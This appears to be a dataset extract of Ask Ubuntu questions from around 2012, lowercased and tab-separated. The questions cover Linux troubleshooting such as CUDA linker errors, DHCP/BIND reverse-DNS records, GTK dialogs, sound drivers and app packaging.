devicequerydrv.cpp : ( .text.startup+0x262 ) : undefined reference to `cudevicegetattribute' devicequerydrv.cpp : ( .text.startup+0x457 ) : undefined reference to `cudevicegetattribute' devicequerydrv.cpp : ( .text.startup+0x4bc ) : undefined reference to `cudevicegetattribute' devicequerydrv.cpp : ( .text.startup+0x502 ) : undefined reference to `cudevicegetattribute' devicequerydrv.cpp : ( .text.startup+0x533 ) : undefined reference to `cudevicegetattribute' obj/x86_64/release/devicequerydrv.cpp.o : devicequerydrv.cpp : ( .text.startup+0x55e ) : more undefined references to `cudevicegetattribute ' follow collect2 : ld returned 1 exit status make [ 2 ] : *** [ ../../bin/linux/release/devicequerydrv ] error 1 make [ 2 ] : leaving directory `/home/john/nvidia_gpu_computing_sdk/c/src/devicequerydrv' make [ 1 ] : *** [ src/devicequerydrv/makefile.ph_build ] error 2 make [ 1 ] : leaving directory `/home/john/nvidia_gpu_computing_sdk/c' make : *** [ all ] error 2 i would appreciate any help that anyone can provide me with . if i can provide any further information please let me know . thanks .
158832	shockwave player in chromium ?	is there a ubuntu 10.04-compatible version of shockwave player to run on the chromium browser ?
158837	dhcp is mangling my ptr records in dns	i originally posted this in linuxquestions http : //www.linuxquestions.org/questions/linux-server-73/dhcp-is-mangling-my-ptr-records-in-dns-4175412344/ without much luck , so i 'll try here . dhcp is repeating the first three octets when it adds a ptr record . from my messages log : dhcpd : added reverse map from 10.2.168.192.2.168.192.in-addr.arpa to ftir.adherent.lab i 'm sure it is something stupid like a missing period , but i have n't been able to figure it out . this happens on both the 192.168.2.xyz and 192.168.4.xyz networks . notice that the ftir computer is already in the hosts and ptr files but a new entry still gets added . also , nowhere in my configuration files do i have adherent with a capital a , but the capitalized version shows up in the mangled file . my dhcp/bind server is ubuntu linux but all of the network computers are windows . here is my system info : $ uname -a linux ati-dhcp.adherent.lan 2.6.32-41-server # 90-ubuntu smp tue may 22 12:41:40 utc 2012 x86_64 gnu/linux $ lsb_release -a distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid $ named -v bind 9.7.0-p1 here are my various configuration files : dhcpd.conf : ddns-update-style interim ; ddns-updates on ; authoritative ; log-facility local1 ; default-lease-time 86400 ; max-lease-time 259200 ; include `` /etc/dhcp3/ddns.key '' ; # adherent internal network with internet access zone adherent.lan . { primary 192.168.1.201 ; key ddns ; } # reverse zone for 192.168.1.xyz zone 1.168.192.in-addr.arpa . { primary 192.168.1.201 ; key ddns ; } # adherent insecure network-no internet access zone lab.adherent.lan . { primary 192.168.2.201 ; key ddns ; } # reverse zone for 192.168.2.xyz zone 2.168.192.in-addr.arpa . { primary 192.168.2.201 ; key ddns ; } # guest-internet only zone guest.adherent.lan . { primary 192.168.4.201 ; key ddns ; } # reverse zone for 192.168.4.xyz zone 4.168.192.in-addr.arpa . { primary 192.168.4.201 ; key ddns ; } # ati shared network : internal ( 192.168.1.xyz ) and visitor ( 192.168.4.xyz ) nets shared-network atishared { # ati internal subnet 192.168.1.0 netmask 255.255.255.0 { # range 192.168.1.10 192.168.1.19 ; deny unknown-clients ; ddns-domainname `` adherent.lan '' ; ddns-rev-domainname `` 1.168.192.in-addr.arpa '' ; option domain-name `` adherent.lan '' ; option routers 192.168.1.201 ; option domain-name-servers 192.168.1.201 ; } # visitor subnet subnet 192.168.4.0 netmask 255.255.255.0 { default-lease-time 3600 ; range 192.168.4.40 192.168.4.49 ; allow unknown-clients ; ddns-domainname `` guest.adherent.lan '' ; ddns-rev-domainname `` 4.168.192.in-addr.arpa '' ; option domain-name `` guest.adherent.lan '' ; option routers 192.168.4.201 ; option domain-name-servers 192.168.4.201 ; } } # adherent insecure network-no internet access ( 192.168.2.xyz ) subnet 192.168.2.0 netmask 255.255.255.0 { range 192.168.2.240 192.168.2.250 ; ddns-domainname `` lab.adherent.lan '' ; ddns-rev-domainname `` 2.168.192.in-addr.arpa '' ; option domain-name `` lab.adherent.lan '' ; option routers 192.168.2.101 ; option domain-name-servers 192.168.2.201 ; } include `` /etc/dhcp3/hosts.dhcp3 '' ; named.conf.local include `` /etc/bind/zones.rfc1918 '' ; include `` /etc/bind/ddns.key '' ; # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # adherent main zone . # all addresses are fixed and from 192.168.1.0/24 # if dhcp does n't have an entry for a computer , it gets put in the guest zone . # zone `` adherent.lan '' { type master ; file `` /var/lib/bind/adherent.lan.hosts '' ; allow-update { key ddns ; } ; } ; zone `` 1.168.192.in-addr.arpa '' { type master ; file `` /var/lib/bind/192.168.1.rev '' ; allow-update { key ddns ; } ; } ; # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # adherent lab zone . # all addresses are from 192.168.2.0/24 # does n't matter if dhcp has an entry for the computer . zone `` lab.adherent.lan '' { type master ; file `` /var/lib/bind/adherent-lab.lan.hosts '' ; allow-update { key ddns ; } ; } ; zone `` 2.168.192.in-addr.arpa '' { type master ; file `` /var/lib/bind/192.168.2.rev '' ; allow-update { key ddns ; } ; } ; # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # adherent guest zone . # all addresses are from 192.168.4.0/24 # if dhcp does n't have an entry for a computer , it gets put in this zone . # zone `` guest.adherent.lan '' { type master ; file `` /var/lib/bind/adherent-guest.lan.hosts '' ; allow-update { key ddns ; } ; } ; zone `` 4.168.192.in-addr.arpa '' { type master ; file `` /var/lib/bind/192.168.4.rev '' ; allow-update { key ddns ; } ; } ; file /var/lib/bind/adherent-lab.lan.hosts $ ttl 3h @ in soa ati-dhcp.adherent.lan . bgordon.adherent-tech.com . ( 2012061801 ; serial 3h ; refresh 1h ; retry 1w ; expire 1h ; minimum ) @ in ns ati-dhcp.adherent.lan . ftir in a 192.168.2.10 gcms in a 192.168.2.12 datalogg in a 192.168.2.13 ta in a 192.168.2.14 instron in a 192.168.2.20 instron2 in a 192.168.2.21 file /var/lib/bind/192.168.2.rev $ ttl 3h @ in soa ati-dhcp.adherent.lan . bgordon.adherent-tech.com . ( 2012061801 ; serial 3h ; refresh ( 3 hours ) 1h ; retry ( 1 hour ) 1w ; expire ( 1 week ) 1h ; minimum ( 1 hour ) ) @ ns ati-dhcp.adherent.lan . 10 ptr ftir.lab.adherent.lan . 12 ptr gcms.lab.adherent.lan . 13 ptr datalogg.lab.adherent.lan . 14 ptr ta.lab.adherent.lan . 20 ptr instron.lab.adherent.lan . 21 ptr instron2.lab.adherent.lan . same file after mangling ( all changes made by dhcp/bind : $ origin . $ ttl 10800 ; 3 hours 2.168.192.in-addr.arpa in soa ati-dhcp.adherent.lan . bgordon.adherent-tech.com . ( 2012061802 ; serial 10800 ; refresh ( 3 hours ) 3600 ; retry ( 1 hour ) 604800 ; expire ( 1 week ) 3600 ; minimum ( 1 hour ) ) ns ati-dhcp.adherent.lan . $ origin 2.168.192.in-addr.arpa . 10 ptr ftir.lab.adherent.lan . 12 ptr gcms.lab.adherent.lan . 13 ptr datalogg.lab.adherent.lan . 14 ptr ta.lab.adherent.lan . $ ttl 43200 ; 12 hours 10.2.168.192 ptr ftir.adherent.lab . $ ttl 10800 ; 3 hours 20 ptr instron.lab.adherent.lan . 21 ptr instron2.lab.adherent.lan .
158843	gnome-shell top panel over fullscreen games	i 've been using gnome-shell for the last two months , and i realised that whenever i try to run games like psychonauts or trine2 in fullscreen , the shell 's top panel is still visible . the strange thing is , that does not happen with video players like gnome-mplayer or vlc , or with flash videos ( e.g . from youtube ) . i 'm running ubuntu 12.10 and gnome-shell 3.4.1 many thanks !
158844	how do i increase the verbosity level of nvidia 's drivers in mythbuntu 12.04 ?	nvidia says to do this : % startx -- -verbose 5 -logverbose 5 but how can i do it without using startx ?
158847	what is the difference of chroot , dchroot and schroot ?	what is the difference of chroot , dchroot and schroot ? what do they have in common ? where are the differences ? which one is needed for what ?
158849	how do i implement a quit dialog in gtk3 ?	i have almost finished my ubuntu app showdown app , but would like to make it somewhat more robust , upon application quit i iterate through the open files checking for unsaved files , if any are found i pop up a dialog informing the user . what i would like to happen is that if the user cancels the dialog the program resumes , if however the user clicks ok , both dialog and main window should close . this is what i have so far . self.connect ( `` delete-event '' , self.checksave ) def checksave ( self , arg1 , arg2 ) : unsaved = false for doc in self.documents : if doc.saved == false : unsaved = true if unsaved : print ( `` unsaved document '' ) dialog = gtk.dialog ( `` really quit ? `` , 0 , gtk.dialogflags.modal ) dialog.add_button ( gtk.stock_no , gtk.responsetype.cancel ) dialog.add_button ( gtk.stock_yes , gtk.responsetype.ok ) box = dialog.get_content_area ( ) label1 = gtk.label ( `` there are unsaved file ( s ) . '' ) label2 = gtk.label ( `` are you sure you want to quit ? '' ) box.add ( label1 ) box.add ( label2 ) box.show_all ( ) response = dialog.run ( ) print ( response ) if response == gtk.responsetype.ok : return ( false ) else : return ( true ) dialog.destroy ( ) when the dialog runs it never output 's the responsetype.ok or responsetype.cancel values , i get random negative numbers such as -4 or -6 , the dialog also never closes and the main window keeps emitting dialog and requires a ctrl+c to quit it .
158851	computer turns off after suspend	i 've run into this rather odd issue . in ubuntu 12.04 , with the latest kernel update , the computer will not wake up from a suspend . much worse that that , it starts to load , immediately turns off , and the usually wo n't turn back on for a few hours ... what the hell is going on ? my computer is an hp pavilion dv6 and i am running 64 bit ubuntu 12.04 with a core 2 duo chip . everything else works okay ...
158853	`` no launchpad project set '' when running `` quickly submitubuntu ''	i have seen the posting here which is regarding the same issue , but the responses were not useful in solving my problem . i am able to generate my package , as well as release it to my ppa with the `` quickly release '' command , but i have been unable to get the `` submitubuntu '' command to work . quickly submitubuntu get launchpad settings launchpad connection is ok no launchpad project set , leave blank to abort . launchpad project name : no matter what i enter for the project name , nothing works . i have my ssh keys and all that set up , and i was even able to upload directly to launchpad with the `` quickly release '' command ... the reason i want the `` submitubuntu '' command to work , is because i am doing this application for the ubuntu app showdown , and it needs to run from /opt , which according to here as well as the rules , can be accomplished via the `` submitubuntu '' command . -- -- edit -- -- i did not know there was a difference between a project and a ppa , and it looks like the submitubuntu command will only work with a project . i created a project , and ran the command and it submitted successfully to the project and the ppa , but i could not associate the ppa with the project because it said the source was not for precise , though when i looked at the details for all of the packages , it said they were for precise ... additionally , the submitted packages are failing to build . will continue to post info as it works out ( or doesnt ) . https : //help.launchpad.net/projects/registering
158854	user interfirance , themes , broken , unreadable parts	arther going on a customizing spree my the desktop themes on unity got messed up i had installed ubuntu tweak and unsettings so i removed them but the default themes and custom ones are still messed up i ran unity -- reset and this is what i get : warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1200004 compiz ( core ) - warn : failed to receive configurenotify event on 0x38000af compiz ( core ) - warn : failed to receive configurenotify event on 0x32000ad initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:4749 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0xc0009e ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a4 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . warn 2012-07-02 19:51:42 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/google-chrome.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-07-02 19:51:42 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/firefox.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-07-02 19:51:42 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-07-02 19:51:42 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-07-02 19:51:42 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . initializing addhelper options ... done initializing animationaddon options ... done initializing annotate options ... done initializing bench options ... done initializing blur options ... done initializing clone options ... done initializing colorfilter options ... done initializing commands options ... done initializing crashhandler options ... done initializing cube options ... done initializing cubeaddon options ... done initializing extrawm options ... done initializing fadedesktop options ... done initializing firepaint options ... done initializing group options ... done initializing imgjpeg options ... done initializing kdecompat options ... done initializing loginout options ... done initializing mag options ... done initializing maximumize options ... done initializing mblur options ... done initializing neg options ... done initializing notification options ... done initializing obs options ... done initializing opacify options ... done initializing put options ... done initializing reflex options ... done initializing resizeinfo options ... done initializing ring options ... done initializing rotate options ... done initializing scaleaddon options ... done initializing scalefilter options ... done initializing screenshot options ... done initializing shelf options ... done initializing shift options ... done initializing showdesktop options ... done initializing showmouse options ... done initializing splash options ... done initializing staticswitcher options ... done initializing switcher options ... done initializing td options ... done initializing thumbnail options ... done initializing trailfocus options ... done initializing wallpaper options ... done initializing water options ... done initializing widget options ... done initializing winrules options ... done initializing wobbly options ... done error 2012-07-02 19:51:43 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` main_menu_key '' setting update `` run_key '' setting update `` autoraise '' setting update `` autoraise_delay '' any ideas ? this is very inconvenient some of the text like in additional drivers are unreadable because they come out white
158855	how can i recover data from a clicking/dying external drive ?	windows asks me to reformat every time i plug it into my computer , so i fired up ubuntu via virtualbox ( selecting the external hard drive in the usb settings for virtualbox beforehand ) to see if i can access it there . does anyone have any suggestions for me ? i have over 1tb of data on this drive and do not want to lose it . when i plug it into an electrical outlet , the light turns on , and when i plug it into my laptop , i can feel it clicking .
158858	how can i install inkscape from bzr ?	in order to get the latest version of inkscape , one has to use bzr . how can i install inkscape using bzr and properly install it on my system ? . detailed step by step guide would be preferable .
158859	philips gogear detected by rhythmbox but not banshee	i got a philips gogear vibe and wanted to use it in ubuntu 12.04 . i was also using banshee instead of rhythmbox , and wanted to keep doing that . the problem is that banshee does n't detect the device , while rhythmbox does . however , rhythmbox crashes when i try to put music on the device ... so i got to use clementine , which works with my device but does n't work with the music lens . so ... is there a way for me to make banshee work with that device ?
158861	why are kde components being installed/updated on 12.04 with gnome ?	i am not yet fully versed with the components installed by default on my machine , so i will apologize in advance if my question is silly . shows that a lot many of ( what i assume are ) kde components ( libk* , kde* , etc . ) are being installed/updated on my machine . that is just the output from sudo apt-fast update & & sudo apt-fast dist-upgrade -y from a few minutes ago . can anyone tell me why ? can i safely remove them ? if yes , how ? thanks in advance for any replies . system specs : fully updated ubuntu 12.04 x86_64 w/kernel3.4 , gnome , unity , core2duo , 4gb
158862	ca n't see anything i type except on internet , ca n't download anything , ca n't even open software center .	if i do anything with sudo terminal says : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . this all started after i canceled the 11 upgrade during the download process
158865	how do i convert my ubuntu installation into a live-usb or live-cd ?	say i have ubuntu installed in a hard drive what can i do to generate a liveusb that is as similar as possible to the installation ?
158869	how to get rid of the orange highlight in unity ?	i 've installed ubuntu 12.04 lts and i 'm using unity . i also installed adwaita theme and elementary icons . everything is cool . highlightings are blue , as i want them to be , but there are some places where the default orange color remains : when clicking on workspace switcher , the borders of the current or the selected workspace are still orange . when dragging a window to the edges of the screen , the highlight effect for the snap window feature is still orange as well . all other highlights are blue , according to the adwaita theme . so , how can i get rid of those two mentioned orange highlights and turn them into blue , following the adwaita color theme ? thanks for your attention . brunces
158871	how do i enable the source code repositories ?	i need to install build-dependencies of something , how do i ensure the source code section of my software sources is enabled ?
158874	how can i easily set up a google cloud print printer ?	i have an hp photosmart b210 this is a e-print printer capable of printing via wifi , i 'm using this printer in google cloud print , however there is a downside , the software that comes with it is only for windows , so to print anything i 'm using my android device . transferring the file to my phone , then with hp 's app or cloud print app send the job to the printer which honestly is not that hard but i feel like i 'm doing more steps than necessary . so , is there a way to set up the printer in ubuntu or is there a 3rd party app in which i could just import/drag and drop the jobs into google 's service and print them ? .
158880	lucid lynx 10.04 support should be longer and not end in april 2013	10.04 and 10.10 are the last usable ubuntu releases in my opinion . - > is there a ( official ) way , like e.g . to start a poll or something , to enforce a longer support than 3 years for the 10.04 lts desktop release ? i mean it 's not my fault that ubuntu choose a different approach from 11.04 onwards and yes , i include unity and 'new ' gnome in my `` do not want '' list . no , gnomeshell is no replacement and not even remotely as usable as 10.04 but i would love to see security updates after april 2013 and i am sure that i am not the only one .
158886	how to download from the web	can someone tell me how to download stuff from the web ? like on windows you have the .exe to help install stuff but on linux all i get is a folder when i download something . am i supposed to do something with the folder or am i missing something ?
158892	`` ./configure : command not found '' error when trying to install the jre	i was trying to install jre on my 64-bit ubuntu 10.04 installation . just to be sure that that is what i really want , i need to run a .jar file . i downloaded java from this link . then i chose linux x64 and downloaded the tar file , i extracted it and tried to compile the source code but had the error . i do n't know whether i downloaded the wrong file or i ran the wrong commands in the terminal after i changed directory using the cd command to the extracted directory , i tried ./configure but i got this error : ./configure : command not found i know that there is an easier way to install java but i just want to understand how to install an application from source in linux as it seems that i will face this problem in the future . thanks in advance
158893	no sound in headphones dell studio 17	i recently decided to try ubuntu . i made a dual-boot installation on my dell studio 17 . the audio plays just fine through the speakers , but will not play through the headphones . only one of the head phone jacks is acknowledged as an output source . please help . i am new to ubuntu so step by step instructions would be preferable . thanks .
158896	rhythmbox in ubuntu 12.04 and ipod touch	i do n't know if anyone else is experiencing something similar to this . i have an ipod touch bought 3.5 years ago . it received the last software update a year ago . after that update i had no problems syncing it in ubuntu 11.04 and 11.10 ( two different laptops ) . transfer of music albums was flawless with banshee and it would even convert files to the right format automatically . now , the same ipod touch , without any further software or firmware update does not work in ubuntu 12.04 rythmbox . the device is mounted and recognized there , but when you drag/drop an album towards the device it does nothing . before you guys tell me to do it , yes , i have tried with banshee and gtkpod . the first also brings up an error message saying that the ipod does not support mp3 files , and gtkpod simply crashes all the time . the result is the same . what is going on here ? why a device that worked before does not work now in 12.04 ? i purchased some music in the ubuntuone store , and would love to have it transferred to my ipod . please no links to outdated online manuals with older versions of rythmbox or banshee ( i 've read them all ) . and again , nothing wrong with the ipod as it worked in 11.04 and 11.10 and it has not been updated since then . i would strongly appreciate any help provided . thank you
158905	no sound ubuntu 12.04 , tried everything	i 've tried to find a solution to this but have n't been able to yet . i 'm using ubuntu 12.04 installing using wubi installer . i have no audio . i can see the sound icon on the bar on top and interact with it . it does n't say mute , it seems normal . `` codec : '' /proc/asound/card*/codec* proc/asound/card0/codec # 0 : codec : idt 92hd75b3x5 proc/asound/card0/codec # 1 : codec : lsi id 1040 proc/asound/card1/codec # 0 : codec : ati r6xx hdmi alsa shows all bars full for idt 92hd75b3x5 , no bars for ati hdmi . please help . i 've reinstalled all drivers as well .
158907	what is the best configuration of dell laptop and which data card is compatible with 10.04 ?	i have plan to purchase a lap top . i have couple of questions : 1 . what is the best confuguration of dell laptop ? 2 . whic modem or data card will be useful , if i am going to install ubuntu 10.04 ? i will so glad to have approperiate answers .
158908	how can i force a preferred sound output device to be used ?	in my sound settings interface , there are two devices for sound output : both refer to the same physical device , which is a network sound device . both work , but only with the second one , simultaneous output to kenwook audio device digital stereo ( iec958 ) on mythbuntu @ mythbuntu , does the output volume respond to being changed . the first one always plays at the same level , and ignores volume settings . every time i boot , the first one is selected . how can i make it so the second one is the default and the first one is disabled or at least never selected ? i 've uploaded to pastebin the output from pacmd list-sinks and the contents of my default.pa file .
158909	how to patch apache mod-proxy 3.0.1 with 3.0.1-1.1 ?	the command $ sudo apt-get install libapache2-mod-proxy-html and then $ sudo service apache2 restart fires : apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/proxy_html.load : can not load /usr/lib/libxml2.so.2 into server : /usr/lib/libxml2.so.2 : can not open shared object file : no such file or directory action 'configtest' failed . because 3.0.1 is buggy and apt-get offers only buggy version . so i am forced to manual install this here but it ends up to unpacked mode ( seen with $ dpkg -l|grep html ) . some discussion here and more here . the bug is also fixed in debian : http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=670633 how to fix this ? how to apply the patch/fix now so i can proceed ?
158911	why does laptop 's mute button keep blinking and ticking if i open certain websites in chrome ?	this is a very strange problem ! i am using hp dv6000 laptop with ubuntu 12.04 . since last few days if i open certain websites in chrome ( e.g . gmail , youtube , etc . ) the mute button led keeps blinking with `` tick tick '' sound . i am using chrome version 20.0.1132.47 update : i noticed if i disable the flash plugin in chrome and then open those sites the problem does not appear . update 2 : also , if battery left is less than 80 % and it is not connected to power and some certain websites are open the problem appears . any idea i could get rid of this annoying problem ?
158916	why does my screen get random color lines and freeze with any operating system ?	i have an asus u52f with intel hd graphics , i5,6gb ram , it is not even a year old ... but after a lil bit of having the computer on no matter what os the graphics will glitch and the whole thing will freeze along with all these random color lines ... .ive tried win7 home , win7 ultimate , and now even ubuntu ... please help me..this is my college computer and the semester will be starting back up very soon ... .oh and i forgot it works in safe mode ... and had for a lil while worked after uninstalling drivers and disabling updates , then it started back up with out an update .
158923	how to display a usb disk icon on the top bar ?	how can i make my ubuntu 12.04 to display the usb icon on the top bar ( together with input method swither , weather indicator ... ) when i add my disk ( any disk ) to my pc , not to add it on the launcher bar ?
158924	why ca n't i boot the ubuntu installer cd ?	i would first like to note that i am using an hp dv6 laptop . i 'm currently trying to create a dual operating system on here but the cd wo n't install anything . here 's the breakdown of what i did and what 's happening : downloaded a 64-bit and 32-bit version of ubuntu 12.04 . burned the two versions on two disc . put the 64-bit cd in the cd drive . turned my computer off and on . computer completely ignored my cd and started to load windows 7 automatically . replaced disk with 32-bit version . turn off and turn on computer . same as step 5 . i 'm having trouble on trying to figure out what the problem is . any ideas ?
158925	( only ) youtube videos automatically fast forward	i recently updated my ubuntu from 11.10 to 12.04 lts and there seems to be a problem while i 'm playing youtube videos they , for no reason , start to fastforward ( audio and video ) . this does not happen with other programs or websites only in youtube videos . it does not matter if they are in flash or in html 5 player this problem persists throughout
158934	compiz effects are n't working properly !	on ubuntu 12.04 , the compiz visual effects appears to be glitchy . i see a `` window flash '' , after rotating the `` desktop cube '' . i 've used the `` magic lamp effect '' when minimizing windows , but the window content , minimizes faster , delaying the window border to minimize . `` so the border and the window content gets apart , like in the picture below '' . i 've tried updating compiz , but no luck . how to fix this problem ? will compiz work properly in xfce ? this did n't happen in lucid lynx . i appriciate any help !
158939	verr_suplib_write_non_sys_group ?	im on a intel mac and ive installed virtualbox so that i can try some linux programs . i first installed ubuntu 12.04 , and that was easy as pie ! then , i got greedy and installed pinguy 12.04 ( shell ) . since i did that , i now can not open either ubuntu or pinguy , and i keep getting these error messages . i can use terminal , but i dont even know what root is or chmod , etc. , so im scared to try it . i am the only user of the computer , but when i bought it , last year , i somehow made a user ( my self ) , but i know how to getinfo and change permissions , but now i keep getting the message above . i did check and /user/xxxx/library/virtualbox is there , with some files . however , when i create my distros in virtual box , a new folder is automatically created and placed at /users/xxxx/virtualbox vms meaning that it is n't putting that folder inside the library folder . im so excited about trying out linux , but now this virtualbox is driving me nuts , and i have uninstalled and reinstalled it a couple times , at least . here is the log error , in part : `` verr_suplib_write_non_sys_group szerr= '' the group is not a system group and it has write access to '/applications/virtualbox.app ' '' i dont understand , since i am the owner , should n't i have write access ? appreciate the help from all !
158942	connect my mobile phone as modem via bluetooth ?	i ca n't find any way to do this in my ubuntu 11.10 . i can do this using data cable which automatically connects me to internet without headache . my mobile model is micromax q-5fb .
158944	century link isp only supports microsoft oses	i 'm trying to set up my computer to run through my roommates isp , when i initially get online i have to go through his isp 's set-up process , when i get to the end of the process it tells me that it only supports microsoft oses . sometimes i get kicked off randomly or ca n't get on at all . i 'm new to ubuntu or any linux os for that matter and do n't have any windows software and ca n't afford any right now . is there some software that i can download to get around this or some settings that i can change or something ? i 've already searched this site and have n't found any previous questions to help me with this , though i did learn a few things . any information will be greatly appreciated .
158949	pendrive can not boot error `` kernel image not found : vesamenu.c32	i am trying to boot ubuntu from a flash drive , but whenever i try and boot it an error comes up and the boot fails . kernel image not found : vesamenu.c32
158950	how to make ubuntu 32 bit read my 4gb ram on a acer travelmate 3210 notebook ?	i have acer travelmate 3210 notebook with 4gb ram , but after i install ubuntu 32bit desktop , ubuntu says my ram is only 2gb . how to make ubuntu use all my ram ? my notebook does n't seem to support ubuntu 64 bit .
158951	how can i install ubuntu if my dvd drive is broken ?	i have win vista as operating system . my dvd drive is not working . i want to replace the os from windows vista to ubuntu . pla guide me by giving details of steps i have to follow
158952	how do i send ascii string to arduino over com port ?	i would like to send an acii string over a com port using the linux terminal . how can i do that . i am using kubuntu 12.04 i am brand new to linux and serial communication . i just got an arduino . i got it up and running using the arduino serial manager . but i would like to use linux terminal instead so i will have more flexibility . my arduino is /dev/ttyacm0 thank you for help .
158953	ubuntu 12.04 login hangs on `` checking battery '' or `` saned , '' then returns to login screen	working earlier tonight , my mouse froze in the middle of the screen , and so i restarted my system . upon trying to log back in , the screen flashes black , and something along the lines of saned : edit /etc/default/sane and checking battery state before it flashes back to the login screen . i 've scanned the askubuntu files which discuss a similar problem and i 've purged and reinstalled : nvidia-common , lightdm , ubuntu-desktop , gdm , gnome-power-manager , lightdm-gtk-greeter , and unity-greeter . i 've deleted ~/.xauthority . my graphics card is : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) so it should n't be a problem with nvidia anything . i can log in as a guest user and with the tty , but i just ca n't log in as my primary user .
158957	how to set the fully qualified domain name in 12.04 ?	i tried adding dns-domain domain.com to /etc/network/interfaces with no luck . when i run hostname -d i get an empty string
158963	launcher shows drives even when they are n't mounted	this has only happened in the last couple of days ( after updates ) , but now my sidebar shows my two external hard disks even when they are n't mounted ( or even connected for that matter ) . when they are connected and mounted , they are each shown twice . for example , this is my sidebar when they are n't connected : and when they are connected : is there a way to fix this ?
158965	were can i find ubuntu-for-android hcl ?	i am choosing an android device and would like to choose one known to be capable of running ubuntu-for-android without problems . is there a page where i can find a list of compatible devices ?
158971	quickly changes the app version	when i share an app with the command : quickly share the app version is changed in the glade file , in the setup.py file ... and upload to the ppa ( then the build will not admit a below version ) . can i disable this ? can i restore the ppa for a right version as 0.0.3 ? thanks in advance !
158977	can the parameters of the music lens be edited ?	i primarily listen to classical music on my laptop . since i 'm obsessed with specifics with my music , i am precise with how i label my genres ( opera , symphony , chorale , etc. ) . is there a way to edit the music lens so that instead of listing `` blues , classic , country ... '' it could list custom parameters ? could the same be done for the `` decade '' parameter ? maybe make it `` century '' , since i have music from back in the 1400 's : )
158981	where can i find free sounds to use in my application ?	we ca n't use copyrighted sounds so where can i found non copyrighted sounds ? for example http : //openclipart.org/ provides non copyrighted images . but what about sounds ? small duration sounds like a bell or something.. maybe the sounds that are provided from a music maker program like magix music maker 18 , can i use them ? i read the terms of use in their site but did n't understand if i can use these sounds ... thanks for any answer ...
158984	is there any app to help track my expenses and make a pie graph each month ?	is there an ubuntu app to help track my expenses and make a pie graph each month ? i want to write down all my receipts and payments and personal purchases and save them on my pc to generate a family finance thing to show my wife every month . does anyone do something similar and have any ideas ?
158986	.desktop and /bin files are included in /opt/extras.ubuntu.com/ < package > with quickly	in the guidelines for the ubuntu app showdown i can read : the .desktop file is installed in the standard location /usr/share/applications , but must have the prefix 'extras- ' added to its name . example : extras-foobar.desktop for a package named foobar . then i renamed pyenglish.desktop.in to extras-pyenglish.desktop.in and changed the setup.py line 57 to : fin = file ( 'extras-pyenglish.desktop.in ' , 'r ' ) and run this command for using /opt with quickly : quickly package -- extras the desktop file is included in /opt/extras.ubuntu.com/package/share/applications/.desktop the bin file is included in /opt/extras.ubuntu.com/package/bin/ the problem is that ubuntu not found the app in the system : ( how could i change this behavior ? thanks !
158988	why does lsof show the same file descriptor for different processes ?	lsof -i :80 command pid user fd type device size/off node name gnome-pan 28597 murat 18u ipv4 2907888 0t0 tcp ... . gnome-pan 28597 murat 19u ipv4 2907903 0t0 tcp ... . dropbox 28624 murat 18u ipv4 2755213 0t0 tcp ... when i list open files with -i switch i found out that some processes have the same fd's.for example above output , 28597 and 28624 pid 's have the same fd's.that means these process can reach the same memory space.what is the reason for this ? how can they reach the same area and why ? also what 's the meaning of u ( 18u ) ? some fd 's are end up with w .
158990	12.04 - connecting acer x203h monitor to new dell xps 15z laptop	i have installed the latest version of ubuntu ( 12.04 ) on my boyfriend 's new dell xps 15z laptop . he uses a microsoft wireless keyboard and mouse , and an acer x203h monitor with his set-up . no problems with the keyboard or mouse , or with connecting the hp printer , but we just ca n't get the laptop to talk to the acer monitor . with his old setup he used a vga cable to connect machine & monitor . new laptop has no vga port , but we 've bought a vga to hdmi adaptor to connect to the laptop . have tried using fn f2 to change the display from laptop to monitor , but it does n't see the monitor at all . help ! is there a driver i can install from somewhere ? or how can i tell ubuntu to look for the monitor on another port ? completely in the dark , and about to get in trouble ! ! thanks
